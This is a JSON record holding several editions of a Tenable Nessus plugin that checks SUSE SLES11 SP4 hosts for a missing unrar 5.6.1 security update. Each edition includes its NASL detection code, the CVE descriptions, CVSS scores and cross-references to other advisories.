Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"unrar-5.6.1-5.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"unrar\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:suse_linux:unrar", "cpe:/o:novell:suse_linux:11"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-09-23T18:22:05", "differentElements": ["reporter", "sourceData"], "edition": 4}, {"bulletin": {"id": "SUSE_SU-2018-0862-1.NASL", "hash": "17e1823dd8f769d371087b7517ccafe812e299c405060e31ec226c19306893be", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)", "description": "This update for unrar to version 5.6.1 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a\n directory-traversal protection mechanism via vectors\n involving a symlink to the . directory, a symlink to the\n .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the\n EncodeFileName::Decode call within the\n Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the\n Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the\n Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2018-04-04T00:00:00", "modified": "2018-04-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/108828", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2017-12938/", "https://www.suse.com/security/cve/CVE-2012-6706/", "https://bugzilla.suse.com/show_bug.cgi?id=1046882", "https://bugzilla.suse.com/show_bug.cgi?id=513804", "https://www.suse.com/security/cve/CVE-2017-12940/", "http://www.nessus.org/u?183f5d82", "https://bugzilla.suse.com/show_bug.cgi?id=1054038", "https://bugzilla.suse.com/show_bug.cgi?id=693890", "https://www.suse.com/security/cve/CVE-2017-12941/", "https://www.suse.com/security/cve/CVE-2017-12942/"], "cvelist": ["CVE-2017-12938", "CVE-2017-12940", "CVE-2017-12941", "CVE-2017-12942", "CVE-2012-6706"], "immutableFields": [], "lastseen": "2021-01-20T14:51:43", "history": [], "viewCount": 13, "enchantments": {"dependencies": {"modified": "2021-01-20T14:51:43", "references": [{"idList": ["GLSA-201708-05", "GLSA-201804-16", "GLSA-201710-21", "GLSA-201709-24"], "type": "gentoo"}, {"idList": ["ASA-201803-14"], "type": "archlinux"}, {"idList": ["FEDORA:06420604AF9F", "FEDORA:682846030B04", "FEDORA:F0C3560EA463"], "type": "fedora"}, {"idList": ["EXPLOITPACK:AE476E9F8D29EFD3EB8A7650FA8A0572"], "type": "exploitpack"}, {"idList": ["CVE-2017-12938", "CVE-2017-12940", "CVE-2017-12941", "CVE-2017-12942", "CVE-2012-6706"], "type": "cve"}, {"idList": ["OPENSUSE-SU-2017:1797-1", "SUSE-SU-2018:0809-1", "SUSE-SU-2018:0863-1", "SUSE-SU-2017:1745-1", "OPENSUSE-SU-2018:0825-1", "SUSE-SU-2017:1760-1", "SUSE-SU-2017:1716-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310874227", "OPENVAS:1361412562310875200", "OPENVAS:1361412562310874188", "OPENVAS:1361412562310851575", "OPENVAS:1361412562310851727", "OPENVAS:1361412562310891003", "OPENVAS:1361412562310811258"], "type": "openvas"}, {"idList": ["EDB-ID:44402"], "type": "exploitdb"}, {"idList": ["ALAS-2018-976"], "type": "amazon"}, {"idList": ["GENTOO_GLSA-201709-24.NASL", "OPENSUSE-2017-724.NASL", "DEBIAN_DLA-1003.NASL", "OPENSUSE-2017-779.NASL", "SUSE_SU-2017-1745-1.NASL", "SUSE_SU-2017-1763-1.NASL", "SUSE_SU-2017-1716-1.NASL", "GENTOO_GLSA-201710-21.NASL", "GENTOO_GLSA-201708-05.NASL", "SUSE_SU-2017-1760-1.NASL"], "type": "nessus"}, {"idList": ["DEBIAN:DLA-1003-1:FD9FD"], "type": "debian"}, {"idList": ["UB:CVE-2017-12940", "UB:CVE-2012-6706", "UB:CVE-2017-12941", "UB:CVE-2017-12942", "UB:CVE-2017-12938"], "type": "ubuntucve"}], "rev": 2}, "score": {"modified": "2021-01-20T14:51:43", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "108828", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0862-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108828);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6706\", \"CVE-2017-12938\", \"CVE-2017-12940\", \"CVE-2017-12941\", \"CVE-2017-12942\");\n\n script_name(english:\"SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for unrar to version 5.6.1 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a\n directory-traversal protection mechanism via vectors\n involving a symlink to the . directory, a symlink to the\n .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the\n EncodeFileName::Decode call within the\n Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the\n Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the\n Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=513804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=693890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6706/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12938/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12940/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12941/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12942/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180862-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?183f5d82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-unrar-13542=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-unrar-13542=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:unrar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"unrar-5.6.1-5.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"unrar\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:suse_linux:unrar", "cpe:/o:novell:suse_linux:11"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-01-20T14:51:43", "differentElements": ["cvss2", "cvss3"], "edition": 5}, {"bulletin": {"id": "SUSE_SU-2018-0862-1.NASL", "hash": "fe1d9c5bf2645caa5b32257a04ab7be2", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)", "description": "This update for unrar to version 5.6.1 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a\n directory-traversal protection mechanism via vectors\n involving a symlink to the . directory, a symlink to the\n .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the\n EncodeFileName::Decode call within the\n Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the\n Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the\n Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2018-04-04T00:00:00", "modified": "2018-04-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/108828", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2017-12938/", "https://www.suse.com/security/cve/CVE-2012-6706/", "https://bugzilla.suse.com/show_bug.cgi?id=1046882", "https://bugzilla.suse.com/show_bug.cgi?id=513804", "https://www.suse.com/security/cve/CVE-2017-12940/", "http://www.nessus.org/u?183f5d82", "https://bugzilla.suse.com/show_bug.cgi?id=1054038", "https://bugzilla.suse.com/show_bug.cgi?id=693890", "https://www.suse.com/security/cve/CVE-2017-12941/", "https://www.suse.com/security/cve/CVE-2017-12942/"], "cvelist": ["CVE-2017-12938", "CVE-2017-12940", "CVE-2017-12941", "CVE-2017-12942", "CVE-2012-6706"], "immutableFields": [], "lastseen": "2021-07-29T04:26:34", "history": [], "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "gentoo", "idList": ["GLSA-201709-24", "GLSA-201804-16", "GLSA-201710-21", "GLSA-201708-05"]}, {"type": "nessus", "idList": ["SUSE_SU-2017-1760-1.NASL", "OPENSUSE-2017-779.NASL", "GENTOO_GLSA-201710-21.NASL", "SUSE_SU-2017-1745-1.NASL", "GENTOO_GLSA-201708-05.NASL", "DEBIAN_DLA-1003.NASL", "GENTOO_GLSA-201709-24.NASL", "SUSE_SU-2017-1763-1.NASL", "OPENSUSE-2017-724.NASL", "SUSE_SU-2017-1716-1.NASL"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-12942", "UB:CVE-2017-12940", "UB:CVE-2017-12941", "UB:CVE-2012-6706", "UB:CVE-2017-12938"]}, {"type": "cve", "idList": ["CVE-2017-12941", "CVE-2017-12940", "CVE-2017-12942", "CVE-2017-12938", "CVE-2012-6706"]}, {"type": "suse", "idList": ["SUSE-SU-2017:1745-1", "SUSE-SU-2017:1760-1", "SUSE-SU-2018:0863-1", "SUSE-SU-2017:1716-1", "OPENSUSE-SU-2018:0825-1", "SUSE-SU-2018:0809-1", "OPENSUSE-SU-2017:1797-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891003", "OPENVAS:1361412562310811258", "OPENVAS:1361412562310851575", "OPENVAS:1361412562310874227", "OPENVAS:1361412562310851727", "OPENVAS:1361412562310874188", "OPENVAS:1361412562310875200"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:AE476E9F8D29EFD3EB8A7650FA8A0572"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1003-1:FD9FD"]}, {"type": "exploitdb", "idList": ["EDB-ID:44402"]}, {"type": "fedora", "idList": ["FEDORA:06420604AF9F", "FEDORA:682846030B04", "FEDORA:F0C3560EA463"]}, {"type": "archlinux", "idList": ["ASA-201803-14"]}, {"type": "amazon", "idList": ["ALAS-2018-976"]}], "modified": "2021-07-29T04:26:34", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-07-29T04:26:34", "rev": 2}}, "objectVersion": "1.6", "pluginID": "108828", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0862-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108828);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6706\", \"CVE-2017-12938\", \"CVE-2017-12940\", \"CVE-2017-12941\", \"CVE-2017-12942\");\n\n script_name(english:\"SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for unrar to version 5.6.1 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a\n directory-traversal protection mechanism via vectors\n involving a symlink to the . directory, a symlink to the\n .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the\n EncodeFileName::Decode call within the\n Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the\n Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the\n Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=513804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=693890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6706/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12938/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12940/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12941/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12942/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180862-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?183f5d82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-unrar-13542=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-unrar-13542=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:unrar\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"unrar-5.6.1-5.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"unrar\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:suse_linux:unrar", "cpe:/o:novell:suse_linux:11"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T04:26:34", "differentElements": ["cvss2", "cvss3", "description", "exploitEase", "modified", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 6}, {"bulletin": {"id": "SUSE_SU-2018-0862-1.NASL", "hash": "3513fd2da9dedf8ca3482639bd640150", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLES11 Security Update : unrar (SUSE-SU-2018:0862-1)", "description": "This update for unrar to version 5.6.1 fixes several issues. These security issues were fixed :\n\n - CVE-2017-12938: Prevent remote attackers to bypass a directory-traversal protection mechanism via vectors involving a symlink to the . directory, a symlink to the .. directory, and a regular file (bsc#1054038).\n\n - CVE-2017-12940: Prevent out-of-bounds read in the EncodeFileName::Decode call within the Archive::ReadHeader15 function (bsc#1054038).\n\n - CVE-2017-12941: Prevent an out-of-bounds read in the Unpack::Unpack20 function (bsc#1054038).\n\n - CVE-2017-12942: Prevent a buffer overflow in the Unpack::LongLZ function (bsc#1054038).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2018-04-04T00:00:00", "modified": "2021-01-19T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/108828", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2017-12940/", "https://www.suse.com/security/cve/CVE-2017-12941/", "http://www.nessus.org/u?183f5d82", "https://www.suse.com/security/cve/CVE-2012-6706/", "https://bugzilla.suse.com/show_bug.cgi?id=693890", "https://www.suse.com/security/cve/CVE-2017-12942/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6706", "https://bugzilla.suse.com/show_bug.cgi?id=513804", "https://bugzilla.suse.com/show_bug.cgi?id=1054038", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12938", "https://bugzilla.suse.com/show_bug.cgi?id=1046882", "https://www.suse.com/security/cve/CVE-2017-12938/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12940", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12941", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12942"], "cvelist": ["CVE-2012-6706", "CVE-2017-12938", "CVE-2017-12940", "CVE-2017-12941", "CVE-2017-12942"], "immutableFields": [], "lastseen": "2021-08-11T13:53:28", "history": [], "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "gentoo", "idList": ["GLSA-201804-16", "GLSA-201708-05", "GLSA-201710-21", "GLSA-201709-24"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-1003.NASL", "OPENSUSE-2017-779.NASL", "SUSE_SU-2017-1716-1.NASL", "SUSE_SU-2017-1760-1.NASL", "SUSE_SU-2017-1745-1.NASL", "GENTOO_GLSA-201708-05.NASL", "OPENSUSE-2017-724.NASL", 